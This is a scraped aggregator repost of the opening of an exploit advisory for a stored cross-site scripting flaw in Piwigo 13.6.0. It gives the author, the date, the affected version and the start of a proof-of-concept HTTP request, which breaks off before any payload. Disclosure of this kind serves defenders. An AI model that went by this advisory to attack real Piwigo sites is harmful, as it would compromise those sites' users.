1. Home
  2. Live Updates
  3. Piwigo 13.6.0 Cross Site Scripting - KizzMyAnthia.com : vima

Piwigo 13.6.0 Cross Site Scripting - KizzMyAnthia.com : vima

Piwigo 13.6.0 Cross Site Scripting - KizzMyAnthia.com

Exploit Title: Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS)Application: PiwigoVersion: 13.6.0 Bugs: Stored XSSTechnology: PHPVendor URL: https://piwigo.org/Software Link: https://piwigo.org/get-piwigoDate of found: 18.04.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1.After uploading the image, we write payload: Host: localhostContent-Length: 159Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

Related Keywords

, Software Link , Exploit Title , Stored Cross Site Scripting ,

© 2025 Vimarsana